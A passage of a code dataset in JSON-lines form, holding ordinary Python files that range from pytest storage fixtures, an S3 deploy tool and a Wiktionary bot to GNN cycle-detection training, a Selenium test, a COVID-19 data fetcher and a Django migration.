init_test_vm_name(request, storage):\n \"\"\"\n Initialize test vm name\n \"\"\"\n\n self = request.node.cls\n\n self.new_vm_name = storage_helpers.create_unique_object_name(\n self.__name__, config.OBJECT_TYPE_VM\n )\n self.vm_names = list()\n self.vm_names.append(self.new_vm_name)\n\n\n@pytest.fixture(scope='class')\ndef init_test_template_name(request, storage):\n \"\"\"\n Initialize test template name\n \"\"\"\n\n self = request.node.cls\n\n self.template_name = storage_helpers.create_unique_object_name(\n self.__name__, config.OBJECT_TYPE_TEMPLATE\n )\n\n\n@pytest.fixture(scope='class')\ndef init_base_params(request, storage):\n \"\"\"\n Initialize base class parameters\n \"\"\"\n\n self = request.node.cls\n\n if not hasattr(self, 'new_storage_domains_count'):\n self.new_storage_domains_count = 1\n self.host_name = None\n self.storage_domain = None\n self.name_pattern = None\n self.new_dc_name = None\n self.nfs_sd_name = None\n self.iscsi_sd_name = None\n self.gluster_sd_name = None\n self.fcp_sd_name = None\n self.cluster_version = None\n self.cluster_upgraded_version = None\n self.dc_version = None\n self.dc_upgraded_version = None\n self.storage_format = None\n self.upgraded_storage_format = None\n self.disk_count = None\n self.template_name = None\n self.templates_names = list()\n self.template_disk_name = None\n\n\n@pytest.fixture(scope='class')\ndef get_template_from_cluster(request, storage):\n \"\"\"\n Get existing first template from cluster\n \"\"\"\n self = request.node.cls\n\n templates_names_list = ll_templates.get_template_from_cluster(\n self.cluster_name\n )\n\n if templates_names_list:\n self.template_name = templates_names_list[0]\n self.template_disk_name = ll_templates.getTemplateDisks(\n self.template_name\n )[0].get_name()\n\n\n@pytest.fixture()\ndef initialize_storage_domain_params(request, storage):\n \"\"\"\n Initialize storage domain parameters for add operation\n \"\"\"\n self = request.node.cls\n\n self.storage_domain_kwargs = {\n 'storage_type': config.STORAGE_TYPE_NFS,\n 'address': config.NFS_DOMAINS_KWARGS[1]['address'],\n 'path': config.NFS_DOMAINS_KWARGS[1]['path']\n }\n","sub_path":"art/tests/rhevmtests/storage/storage_qcow2_v3/fixtures.py","file_name":"fixtures.py","file_ext":"py","file_size_in_byte":8746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"479526012","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport argparse\nimport s3\n\n\ndef main():\n \"\"\" Entry point for the package, as defined in setup.py. \"\"\"\n \n # Get command line input/output arguments\n parser = argparse.ArgumentParser(\n description='Instantly deploy static HTML sites to S3 at the command line.'\n )\n parser.add_argument(\n 'www_dir',\n help='Directory containing the HTML files for your website.'\n )\n parser.add_argument(\n 'bucket_name',\n help='Name of S3 bucket to deploy to, e.g. 
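# Editor's sketch of the setup/teardown idiom the fixtures above rely on: a
# class-scoped fixture stashes state on request.node.cls and registers a
# finalizer that runs once after the last test in the class. The resource
# name here is a hypothetical placeholder, not a fixture from the record.
import pytest

@pytest.fixture(scope='class')
def tracked_resource(request):
    self = request.node.cls
    self.resource = 'allocated'      # setup, visible to every test in the class

    def finalizer():
        self.resource = None         # teardown, runs once per class

    request.addfinalizer(finalizer)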
mybucket.'\n )\n args = parser.parse_args()\n \n # Deploy the site to S3!\n s3.deploy(args.www_dir, args.bucket_name)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"alotofeffort/alotofeffort.py","file_name":"alotofeffort.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"275927889","text":"with open('file.in', 'rt') as fin:\n numbers = list(map(int, fin.readlines()))\n\nnumbers.sort()\ndifferences = {0: 0, 1: 0, 2: 0, 3: 1}\n\nfor i in range(len(numbers) - 1):\n differences[numbers[i + 1] - numbers[i]] += 1\n\n\ndifferences[numbers[0]] += 1\nprint(differences[1])\nprint(differences[3])\nprint(differences[1] * differences[3])\n","sub_path":"10/part_1.py","file_name":"part_1.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"152744790","text":"import sys\nimport math\nimport pickle\nimport numpy as np\nfrom sklearn import svm\n\nsplit_ratio=float(sys.argv[1])\n\nf=open(\"/home/ubuntu/results/saliency/featured.pkl\",\"rb\")\nfeatured_list=pickle.load(f)\nf.close()\n\nf=open(\"/home/ubuntu/results/saliency/wordlist.pkl\",\"rb\")\nword_list=pickle.load(f)\nf.close()\n\nf=open(\"/home/ubuntu/results/saliency/idf.pkl\",\"rb\")\nidf=pickle.load(f)\nf.close()\n\nf=open(\"/home/ubuntu/results/saliency/centrality.pkl\",\"rb\")\ncentrality=pickle.load(f)\nf.close()\n\nf=open(\"/home/ubuntu/results/saliency/keyphrase.pkl\",\"rb\")\nkey_phrase=pickle.load(f)\nf.close()\n\nf=open(\"/home/ubuntu/results/saliency/svmclf.pkl\",\"rb\")\ns_clf=pickle.load(f)\nf.close()\n\nsample_prelist=[]\ncount=0\n\nfor i in range(0,int(split_ratio*len(featured_list))):\n\tabs_dict=featured_list[i]['abs']\n\tbody_dict=featured_list[i]['body']\n\ta_mat=[]\n\tfor a_key in abs_dict.keys():\n\t\tpred_input=np.array([[key_phrase[word_list.index(a_key)],abs_dict[a_key][0],abs_dict[a_key][1]-abs_dict[a_key][0],abs_dict[a_key][2],idf[word_list.index(a_key)],centrality[a_key]]])\n\t\tpred_saliency=list(s_clf.predict(pred_input))[0]\n\t\ta_mat.append([abs_dict[a_key][0],abs_dict[a_key][1]-abs_dict[a_key][0],abs_dict[a_key][2],idf[word_list.index(a_key)],centrality[a_key],pred_saliency])\n\tif not a_mat:\n\t\tcontinue\n\tU,S,V=np.linalg.svd(np.array(a_mat),full_matrices=True)\n\tfor b_key in body_dict.keys():\n\t\tif b_key in abs_dict.keys():\n\t\t\tcontinue\n\t\tcount+=1\n\t\tprint(count,abs_dict.keys(),b_key)\n\t\t_feature=[idf[word_list.index(b_key)],centrality[b_key]]\n\t\t_feature.extend(list(V.flatten()))\n\t\tsample_prelist.append(_feature)\n\n# print(sample_prelist)\n\nf=open(\"/home/ubuntu/results/coclf/svd_trainlist.pkl\",\"wb\")\npickle.dump(sample_prelist,f)\nf.close()","sub_path":"coclf/SVDtrainSample.py","file_name":"SVDtrainSample.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"496481863","text":"n = int(input())\ninn = 0\nout = 0\nfor i in range(n):\n x = int(input())\n if 10 <= x <= 20:\n inn += 1\n else:\n out += 1\n\nprint(\"%d in\\n%d out\" % (inn, out), end=\"\\n\")","sub_path":"uri-online-judge/1072.py","file_name":"1072.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"152453061","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pywikibot, re, sys, argparse\n\nimport blib\nfrom blib import 
getparam, rmparam, tname, pname, msg, site\n\ndef process_text_on_page(index, pagetitle, text):\n def pagemsg(txt):\n msg(\"Page %s %s: %s\" % (index, pagetitle, txt))\n\n def expand_text(tempcall):\n return blib.expand_text(tempcall, pagetitle, pagemsg, args.verbose)\n\n def convert_traditional_to_simplified(langcode, trad):\n trad_simp = expand_text(\"{{#invoke:User:Benwing2/languages/utilities|generateForms|%s|%s}}\" % (langcode, trad))\n if not trad_simp:\n return trad_simp\n if \"||\" in trad_simp:\n trad, simp = trad_simp.split(\"||\", 1)\n return simp\n else:\n return trad_simp\n\n notes = []\n\n parsed = blib.parse_text(text)\n\n def dispchar(ch):\n # FIXME, might need fixing for Python 3\n return \"%s (%s)\" % (ch, ch.encode(\"unicode_escape\"))\n\n def check_simplified_matches_traditional(trad, simp, langcode, langname, prefix):\n if simp == trad:\n pagemsg(\"%s simplified form %s same as %s traditional %s, removing\" % (prefix, simp, langname, trad))\n return trad\n trad_to_simp = convert_traditional_to_simplified(langcode, trad)\n if not trad_to_simp:\n return False\n if trad_to_simp == simp:\n pagemsg(\"%s simplified form %s matches %s traditional %s, removing\" % (prefix, simp, langname, trad))\n return trad\n rev_trad_to_simp = convert_traditional_to_simplified(langcode, simp)\n if not rev_trad_to_simp:\n return False\n if rev_trad_to_simp == trad:\n pagemsg(\"%s simplified form %s and %s traditional %s given in reverse order from what's expected, still removing\"\n % (prefix, trad, langname, simp))\n return simp\n pagemsg(\"WARNING: %s simplified form %s doesn't match auto-generated simplified %s from %s traditional %s%s: %s\"\n % (prefix, dispchar(simp), dispchar(trad_to_simp), langname, dispchar(trad),\n (\"; assuming params reversed, 'simplified' %s doesn't match auto-generated 'simplified' %s from 'traditional' %s, either\"\n % (dispchar(trad), dispchar(rev_trad_to_simp), dispchar(simp)) if rev_trad_to_simp != simp else \"\"),\n str(t)))\n return False\n\n for t in parsed.filter_templates():\n def getp(param):\n return getparam(t, param)\n tn = tname(t)\n if tn in [\"pinyin reading of\", \"pinread\", \"pinof\"]:\n trad = getp(\"tas\") or getp(\"t\") or getp(\"trad\") or getp(\"tra\") or getp(\"1\")\n simp = getp(\"s\") or getp(\"simp\") or getp(\"sim\") or getp(\"2\")\n if simp:\n trad = check_simplified_matches_traditional(trad, simp, \"cmn\", \"Mandarin\", \"First\")\n if not trad:\n continue\n trad2 = getp(\"t2\") or getp(\"trad2\") or getp(\"tra2\") or getp(\"3\")\n simp2 = getp(\"s2\") or getp(\"simp2\") or getp(\"sim2\") or getp(\"4\")\n if simp2:\n trad2 = check_simplified_matches_traditional(trad2, simp2, \"cmn\", \"Mandarin\", \"Second\")\n if not trad2:\n continue\n remaining_params = [x for x in [getp(\"5\"), getp(\"6\"), getp(\"7\"), getp(\"8\"), getp(\"9\"), getp(\"10\")] if x]\n for param in t.params:\n pn = pname(param)\n pv = str(param.value)\n if pn not in [\n \"tas\", \"t\", \"trad\", \"tra\", \"1\",\n \"s\", \"simp\", \"sim\", \"2\",\n \"t2\", \"trad2\", \"tra2\", \"3\",\n \"s2\", \"simp2\", \"sim2\", \"4\",\n \"5\", \"6\", \"7\", \"8\", \"9\", \"10\",\n \"lang\", \"def\", # ignored\n ]:\n pagemsg(\"WARNING: Unrecognized parameter %s=%s in {{pinyin reading of}} template %s\"\n % (pn, pv, str(t)))\n break\n else: # no break\n all_numeric = [x for x in [trad, trad2] + remaining_params if x]\n origt = str(t)\n del t.params[:]\n blib.set_param_chain(t, all_numeric, \"1\")\n blib.set_template_name(t, \"cmn-pinyin of\")\n if origt != str(t):\n 
pagemsg(\"Replaced %s with %s\" % (origt, str(t)))\n notes.append(\"convert {{pinyin reading of}} to {{cmn-pinyin of}}, standardize params and remove unnecessary simplified variants\")\n\n elif tn == \"yue-jyutping of\":\n trad = getp(\"tas\") or getp(\"trad\") or getp(\"tra\") or getp(\"1\")\n simp = getp(\"sim\") or getp(\"simp\") or getp(\"2\")\n if simp:\n trad = check_simplified_matches_traditional(trad, simp, \"yue\", \"Cantonese\", \"First\")\n if not trad:\n continue\n trad2 = getp(\"tra2\") or getp(\"trad2\") or getp(\"3\")\n simp2 = getp(\"sim2\") or getp(\"simp2\") or getp(\"4\")\n if simp2:\n trad2 = check_simplified_matches_traditional(trad2, simp2, \"yue\", \"Cantonese\", \"Second\")\n if not trad2:\n continue\n remaining_params = [x for x in [getp(\"5\")] if x]\n for param in t.params:\n pn = pname(param)\n pv = str(param.value)\n if pn not in [\n \"tas\", \"trad\", \"tra\", \"1\",\n \"sim\", \"simp\", \"2\",\n \"tra2\", \"trad2\", \"3\",\n \"sim2\", \"simp2\", \"4\",\n \"5\",\n ]:\n pagemsg(\"WARNING: Unrecognized parameter %s=%s in {{yue-jyutping of}} template %s\"\n % (pn, pv, str(t)))\n break\n else: # no break\n all_numeric = [x for x in [trad, trad2] + remaining_params if x]\n origt = str(t)\n del t.params[:]\n blib.set_param_chain(t, all_numeric, \"1\")\n if origt != str(t):\n pagemsg(\"Replaced %s with %s\" % (origt, str(t)))\n notes.append(\"standardize params in {{yue-jyutping of}} and remove unnecessary simplified variants\")\n\n text = str(parsed)\n return text, notes\n\nparser = blib.create_argparser(\"Clean {{pinyin reading of}} and {{yue-jyutping of}}\", include_pagefile=True, include_stdin=True)\nargs = parser.parse_args()\nstart, end = blib.parse_start_end(args.start, args.end)\n\nblib.do_pagefile_cats_refs(args, start, end, process_text_on_page, edit=True, stdin=True,\n default_refs=[\"Template:pinyin reading of\", \"Template:yue-jyutping of\"])\n","sub_path":"clean_pinyin_jyutping_of.py","file_name":"clean_pinyin_jyutping_of.py","file_ext":"py","file_size_in_byte":5877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"346881564","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## Example k-cycle classification\n\n\nimport os\nimport torch\nimport torch.nn.functional as F\nfrom torch_geometric.data import DataLoader\nfrom torch_geometric.transforms import OneHotDegree\nimport argparse\nimport numpy as np\nimport time\nimport yaml\nfrom models.smp_cycles import SMP\nfrom models.gin import GIN\nfrom datasets_generation.build_cycles import FourCyclesDataset\nfrom models.utils.transforms import EyeTransform, RandomId, DenseAdjMatrix\nfrom models import ppgn\n\n# Change the following to point to the the folder where the datasets are stored\nif os.path.isdir('/datasets2/'):\n rootdir = '/datasets2/CYCLE_DETECTION/'\nelse:\n rootdir = './data/datasets_kcycle_nsamples=10000/'\nyaml_file = './config_cycles.yaml'\n# yaml_file = './benchmark/kernel/config4cycles.yaml'\ntorch.manual_seed(0)\nnp.random.seed(0)\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--epochs', type=int, default=300)\nparser.add_argument('--k', type=int, default=6,\n help=\"Length of the cycles to detect\")\nparser.add_argument('--n', type=int, default=56,\n help='Average number of nodes in the graphs')\nparser.add_argument('--save-model', action='store_true',\n help='Save the model once training is done')\nparser.add_argument('--wandb', action='store_true',\n help=\"Use weights and biases 
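# Editor's sketch of the traditional/simplified consistency check implemented
# in the pinyin/jyutping cleanup script above. The real code expands a
# MediaWiki module to convert forms; the converter here is stubbed with a
# two-entry toy table, so both the table and the sample words are illustrative.
TRAD_TO_SIMP = {u'漢': u'汉', u'語': u'语'}

def to_simplified(text):
    return ''.join(TRAD_TO_SIMP.get(ch, ch) for ch in text)

def simplified_matches(trad, simp):
    if simp == trad:
        return True                       # identical forms: the simplified param is redundant
    if to_simplified(trad) == simp:
        return True                       # expected order: traditional, then simplified
    return to_simplified(simp) == trad    # parameters given in reverse order

print(simplified_matches(u'漢語', u'汉语'))  # True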
library\")\nparser.add_argument('--gpu', type=int, help='Id of gpu device. By default use cpu')\nparser.add_argument('--lr', type=float, default=0.001, help=\"Initial learning rate\")\nparser.add_argument('--batch-size', type=int, default=16)\nparser.add_argument('--weight-decay', type=float, default=0.0001)\nparser.add_argument('--clip', type=float, default=10, help=\"Gradient clipping\")\nparser.add_argument('--one-hot', action='store_true', default=False,\n help='Use a one-hot encoding of the degree as node features')\nparser.add_argument('--identifiers', action='store_true', default=False,\n help='Use a one hot encoding of the nodes as node features.')\nparser.add_argument('--random', action='store_true', help=\"Use random identifiers as node features.\")\nparser.add_argument('--name', type=str, help=\"Name for weights and biases\")\nparser.add_argument('--proportion', type=float, default=1.0,\n help='Proportion of the training data that is kept')\nargs = parser.parse_args()\n\n# Log parameters\ntest_every_epoch = 5\nprint_every_epoch = 1\nlog_interval = 20\n\nif args.name:\n args.wandb = True\n\n# Handle the device\nuse_cuda = args.gpu is not None and torch.cuda.is_available()\nif use_cuda:\n device = torch.device(\"cuda:\" + str(args.gpu))\n torch.cuda.set_device(args.gpu)\n os.environ['CUDA_VISIBLE_DEVICES'] = str(args.gpu)\nelse:\n device = \"cpu\"\nargs.device = device\nargs.kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}\nprint('Device used:', device)\n\n# Load the config file of the model\nwith open(yaml_file) as f:\n model_config = yaml.load(f, Loader=yaml.FullLoader)\n print(model_config)\n\nmodel_name = model_config['model_name']\nmodel_config.pop('model_name')\nprint(\"Model name:\", model_name)\n\n# Create a name for weights and biases\nif args.wandb:\n import wandb\n if args.name is None:\n if args.random:\n args.name = 'random' + f'_{args.k}_{args.n}'\n else:\n args.name = model_name + f'_{args.k}_{args.n}'\n wandb.init(project=\"smp\", config=model_config, name=args.name)\n wandb.config.update(args)\n\n# Store maximum number of nodes for each pair (k, n)\n# Used by provably powerful graph networks\nmax_num_nodes = {4: {12: 12, 20: 20, 28: 28, 36: 36},\n 6: {20: 25, 31: 38, 42: 52, 56: 65},\n 8: {28: 38, 50: 56, 66: 76, 72: 90}}\n# Store the maximum degree for the one-hot encoding\nmax_degree = {4: {12: 4, 20: 6, 28: 7, 36: 7},\n 6: {20: 4, 31: 6, 42: 8, 56: 7},\n 8: {28: 4, 50: 6, 66: 7, 72: 8}}\n\n\ndef train(epoch):\n \"\"\" Train for one epoch. 
\"\"\"\n model.train()\n lr_scheduler(args.lr, epoch, optimizer)\n loss_all = 0\n for batch_idx, data in enumerate(train_loader):\n data = data.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = F.nll_loss(output, data.y)\n loss.backward()\n loss_all += loss.item() * data.num_graphs\n torch.nn.utils.clip_grad_norm_(model.parameters(), args.clip)\n optimizer.step()\n return loss_all / len(train_loader.dataset)\n\n\ndef test(loader):\n model.eval()\n correct = 0\n for data in loader:\n data = data.to(device)\n output = model(data)\n pred = output.max(dim=1)[1]\n correct += pred.eq(data.y).sum().item()\n return correct / len(loader.dataset)\n\n\ndef lr_scheduler(lr, epoch, optimizer):\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr * (0.995 ** (epoch / 5))\n\n# Define the transform to use in the dataset\nif args.one_hot:\n max_degree = max_degree[args.k][args.n]\n transform = OneHotDegree(max_degree, cat=False)\n model_config['num_input_features'] = max_degree + 1\n if args.n == 28:\n transform = OneHotDegree(max_degree=7, cat=False)\n model_config['num_input_features'] = 8\nelif args.identifiers:\n transform = EyeTransform()\n model_config['num_input_features'] = args.n\nelif args.random:\n transform = RandomId()\n model_config['num_input_features'] = 1\nelse:\n transform = None\n model_config['num_input_features'] = 1\n\n\nstart = time.time()\n\nmodel_config['num_layers'] = args.k\n\nif model_name == 'SMP':\n model_config['use_batch_norm'] = args.k > 6 or args.n > 30\n model = SMP(**model_config).to(device)\nif model_name == 'PPGN':\n transform = DenseAdjMatrix(max_num_nodes[args.k][args.n])\n model_config.pop('num_input_features', None)\n model_config.pop('use_x', None)\n model_config.pop('use_u', None)\n model = ppgn.Powerful(**model_config).to(device)\nif model_name == 'GIN':\n model_config['use_batch_norm'] = args.k > 6 or args.n > 50\n model_config.pop('use_x', None)\n model_config.pop('hidden_u', None)\n model = GIN(**model_config).to(device)\n\noptimizer = torch.optim.SGD(model.parameters(), lr=args.lr, momentum=0.5, weight_decay=args.weight_decay)\n# Load the data\nprint(\"Transform used:\", transform)\nbatch_size = args.batch_size\ntrain_data = FourCyclesDataset(args.k, args.n, rootdir, proportion=args.proportion, train=True, transform=transform)\ntest_data = FourCyclesDataset(args.k, args.n, rootdir, proportion=args.proportion, train=False, transform=transform)\ntrain_loader = DataLoader(train_data, batch_size, shuffle=True)\ntest_loader = DataLoader(test_data, batch_size, shuffle=True)\n\nprint(\"Starting to train\")\nfor epoch in range(args.epochs):\n epoch_start = time.time()\n tr_loss = train(epoch)\n if epoch % print_every_epoch == 0:\n acc_train = test(train_loader)\n current_lr = optimizer.param_groups[0][\"lr\"]\n duration = time.time() - epoch_start\n print(f'Time:{duration:2.2f} | {epoch:5d} | Loss: {tr_loss:2.5f} | Train Acc: {acc_train:2.5f} | LR: {current_lr:.6f}')\n if epoch % test_every_epoch == 0:\n acc_test = test(test_loader)\n print(f'Test accuracy: {acc_test:2.5f}')\n if args.wandb:\n wandb.log({\"Epoch\": epoch, \"Duration\": duration, \"Train loss\": tr_loss, \"train accuracy\": acc_train,\n \"Test acc\": acc_test})\n else:\n if args.wandb:\n wandb.log({\"Epoch\": epoch, \"Duration\": duration, \"Train loss\": tr_loss, \"train accuracy\": acc_train})\n\ncur_lr = optimizer.param_groups[0][\"lr\"]\nprint(f'{epoch:2.5f} | Loss: {tr_loss:2.5f} | Train Acc: {acc_train:2.5f} | LR: {cur_lr:.6f} | Test Acc: 
 {acc_test:2.5f}')\nprint(f'Elapsed time: {(time.time() - start) / 60:.1f} minutes')\nprint('done!')\n\nfinal_acc = test(test_loader)\nprint(f\"Final accuracy: {final_acc}\")\nprint(\"Done.\")\n","sub_path":"cycles_main.py","file_name":"cycles_main.py","file_ext":"py","file_size_in_byte":7963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"521396302","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# @Time : 2020/12/3 6:58 PM\n# @Author : jiajia.gu\nimport unittest\nfrom selenium.webdriver.common.touch_actions import TouchActions\nfrom study_plan_sale_test.config.config import url3\nfrom study_plan_sale_test.common.common import *\nfrom study_plan_sale_test.page.studyPlanPage import StudyPlan\n\n\nclass Lv3ToLV5(unittest.TestCase):\n\n    def setUp(self):\n        u'''No setup preconditions are needed, so pass would also do'''\n        print(\"Starting execution\")\n        # pass\n\n    def test_Level(self):  # test methods must start with 'test'\n        freeSalePage_url = url3\n        driver = get_url(freeSalePage_url)\n        page = StudyPlan(driver)\n        chooseStudyInfo(page)\n        # driver.TouchActions.scroll(\"am-picker-col-mask\", 0, +200).perform()\n        element1 = page.am_picker_col_indicator_loc()[0]\n        TouchActions(driver).long_press(element1)\n        TouchActions(driver).flick_element(element1, 0, 300, 30).perform()\n\n        time.sleep(3)\n        page.study_plan_bt_btn_loc()[0].click()  # after picking the age, click to finish the placement test\n        time.sleep(5)\n        page.imager_inner_loc()[2].click()  # click to build the personalized study plan\n        time.sleep(5)\n        page.select_item_loc()[2].click()  # select the desired improvement\n        time.sleep(5)\n\n        get_sale_page(page)\n\n        startingLevel = page.study_target_item_content_loc()[0].get_attribute('innerHTML')\n        targetingLevel = page.study_target_item_content_loc()[1].get_attribute('innerHTML')\n        self.assertEqual(startingLevel, u'Lv.3', msg='failed')  # verify the starting level is Lv.3\n        self.assertEqual(targetingLevel, u'Lv.5', msg='failed')  # verify the target level is Lv.5\n\n    def tearDown(self):\n        u'''No teardown postconditions are needed, so pass would also do'''\n        print(\"Finishing...\")\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n","sub_path":"study_plan_sale_test/TestCase/Level3toLevel5.py","file_name":"Level3toLevel5.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"168764174","text":"from datetime import datetime\nimport urllib, json, csv\nfrom urllib.request import urlopen\n\n#returns a list of all the countries\ndef get_countries():\n    world_data = get_globalCases()\n    c = []\n    for country in world_data:\n        c.append(country[0])\n    return sorted(c,key=None)\n\n#returns all the data by country requested\ndef get_countryCase(c):\n    world_data = get_globalCases()\n    if c == \"All\":\n        i = 1\n        data = []\n        # print(world_data[0])\n        while i < len(world_data[0]):\n            # print(world_data[0][i]['date'])\n            date = world_data[0][i]['date']\n            confirmed = 0\n            deaths = 0\n            recovered = 0\n            j = 0\n            while j < len(world_data):\n                confirmed += world_data[j][i]['confirmed']\n                deaths += world_data[j][i]['deaths']\n                recovered += world_data[j][i]['recovered']\n                j += 1\n            data.append({'date':date,'confirmed':confirmed,'deaths':deaths,'recovered':recovered})\n            i += 1\n        return data\n    else:\n        for country in world_data:\n            if country[0] == c:\n                return country[1:]\n\n#returns an int with the total number of coronavirus cases so far\ndef get_totalGlobalCases():\n    world_data = get_globalCases()\n    # print(world_data)\n    confirmed = 0\n    for country in world_data:\n        confirmed += country[-1]['confirmed']\n    return confirmed\n\n#fetch global confirmed/death/recovery data by date\ndef get_globalCases():\n    global_cases = [] #array storing dicts {'date': 123123,
 'confirmed', 'deaths', 'recovered'}\n    #read from api\n    url = \"https://pomber.github.io/covid19/timeseries.json\"\n    response = urlopen(url)\n    data = json.loads(response.read())\n\n    #global_cases = data[\"Afghanistan\"]\n\n    #print(data[\"Afghanistan\"][0])\n    for country in data:\n        c = [country]\n        for date in data[country]:\n            # print(date)\n            # added = False\n            #go through each date already in dict, append country's data to existing data for that date\n            # for stored_date in global_cases:\n                #print(stored_date)\n                #print(date)\n                # if stored_date[\"date\"] == date[\"date\"]:\n                #     added = True #no need to add this date as new dict to global_cases\n                #     stored_date[\"confirmed\"] += date[\"confirmed\"]\n                #     stored_date[\"deaths\"] += date[\"deaths\"]\n                #     stored_date[\"recovered\"] += date[\"recovered\"]\n                # #create new dictionary for date in global_cases if one wasn't found\n                # if not added:\n                #     print([country,date])\n            c.append(date)\n        global_cases.append(c)\n    # print(global_cases[0:10])\n    return global_cases\n\n#returns the latest day-over-day new deaths per country\ndef get_newCountryCases():\n    world_data = get_globalCases()\n    # print(world_data)\n    data = []\n    for country in world_data:\n        # print(country[0])\n        name = country[0]\n        # print(country[-1][\"deaths\"])\n        deaths = country[-1][\"deaths\"] - country[-2][\"deaths\"]\n        data.append({\"country\":name, \"deaths\":deaths})\n\n\n    return data\n\n# print(get_newCountryCases())\n\n#returns dictionary containing global counts (new confirmed, total confirmed, total deaths, etc.)\ndef get_globalCountData():\n    url = \"https://api.covid19api.com/summary\"\n    response = urlopen(url)\n    data = json.loads(response.read())\n    # print(type(data))\n    # print(data[\"Global\"])\n    return data[\"Global\"]\n\n#returns array of the most recent new cases and deaths by state\n#first index of array represents the date for the data (csv is a few days behind)\n#format: [date, [date, statename, fips, newcases, newdeaths], ...]\ndef get_StatesData():\n    out = [] #array of arrays\n    data = []\n    today = datetime.today().strftime('%Y-%m-%d')\n    # print(today)\n    with open(\"data/us-states.csv\") as csvfile:\n        csvdata = csv.reader(csvfile, delimiter=',')\n        # print(csvdata)\n        #convert csvreader to array\n        for row in csvdata:\n            data.append(row)\n    #most recent date = the one at the bottom\n    date = data[-1][0]\n    yesterday = data[-56][0]\n    #how many states/territories are included for this date (for indexing)\n    rows = int(data[-1][2])\n    # print(date, yesterday)\n    out.append(date)\n\n    #print(data[100])\n    #go through
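# Editor's sketch: the fixed offsets used in this file (data[-56], the
# hard-coded rows=2908 below) silently break when the CSV gains or loses rows.
# A groupby/diff over the same NYT-style us-states.csv (columns
# date,state,fips,cases,deaths) computes day-over-day deltas directly; this is
# an alternative approach, not the original author's method.
import pandas as pd

df = pd.read_csv('data/us-states.csv', parse_dates=['date'])
df = df.sort_values(['state', 'date'])
delta = df.groupby('state')[['cases', 'deaths']].diff().fillna(0).astype(int)
df['new_cases'] = delta['cases']
df['new_deaths'] = delta['deaths']
latest = df[df['date'] == df['date'].max()]
print(latest[['date', 'state', 'new_cases', 'new_deaths']].head())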
data finding rows that match the date\n for idx in range(len(data)):\n if data[idx][0] == date:\n #print(int(data[idx-rows+1][3]))\n #subtract todays data from yesterday's to get # new cases/deaths\n temp = [date, data[idx][1], data[idx][2], data[idx][3], int(data[idx][4]) - int(data[idx-rows+1][4]), int(data[idx][5]) - int(data[idx-rows+1][5]) ]\n out.append(temp)\n\n #print(out)\n return out\n\n# print(get_CountiesData())\n\n #returns states-albers-10m.json as a variable\ndef get_statesjson():\n with open(\"static/json/states-albers-10m.json\") as jsonfile:\n data = json.loads(jsonfile.read())\n return data\n\n#returns counties-albers-10m.json as a variable\ndef get_countiesjson():\n with open(\"static/json/counties-albers-10m.json\") as jsonfile:\n data = json.loads(jsonfile.read())\n return data\n\n# get_statesjson()\n\n#returns countries-50m.json as a variable\ndef get_worldjson():\n with open(\"static/json/countries-50m.json\") as jsonfile:\n data = json.loads(jsonfile.read())\n return data\n\n# print(sorted(get_countries(),key=None))\n","sub_path":"app/getdata.py","file_name":"getdata.py","file_ext":"py","file_size_in_byte":6775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"491695630","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('courses', '0003_auto_20150724_0223'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Lesson',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, verbose_name='ID', serialize=False)),\n ('name', models.CharField(verbose_name='Nome', max_length=100)),\n ('description', models.TextField(verbose_name='Descrição', blank=True)),\n ('number', models.IntegerField(default=0, verbose_name='Número (ordem)', blank=True)),\n ('release_date', models.DateField(null=True, verbose_name='Data de Liberação', blank=True)),\n ('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Criado em')),\n ('updated_at', models.DateTimeField(auto_now=True, verbose_name='Atualizado em')),\n ('course', models.ForeignKey(related_name='lessons', to='courses.Course', verbose_name='Curso')),\n ],\n options={\n 'ordering': ['number'],\n 'verbose_name': 'Aula',\n 'verbose_name_plural': 'Aulas',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Material',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, verbose_name='ID', serialize=False)),\n ('name', models.CharField(verbose_name='Nome', max_length=100)),\n ('embedded', models.TextField(verbose_name='Video embedded', blank=True)),\n ('archive', models.FileField(upload_to='lessons/materials', null=True, blank=True)),\n ('lesson', models.ForeignKey(related_name='materials', to='courses.Lesson', verbose_name='Aula')),\n ],\n options={\n 'verbose_name': 'Material',\n 'verbose_name_plural': 'Materiais',\n },\n bases=(models.Model,),\n ),\n migrations.AlterField(\n model_name='announcement',\n name='course',\n field=models.ForeignKey(related_name='announcements', to='courses.Course', verbose_name='Curso'),\n ),\n 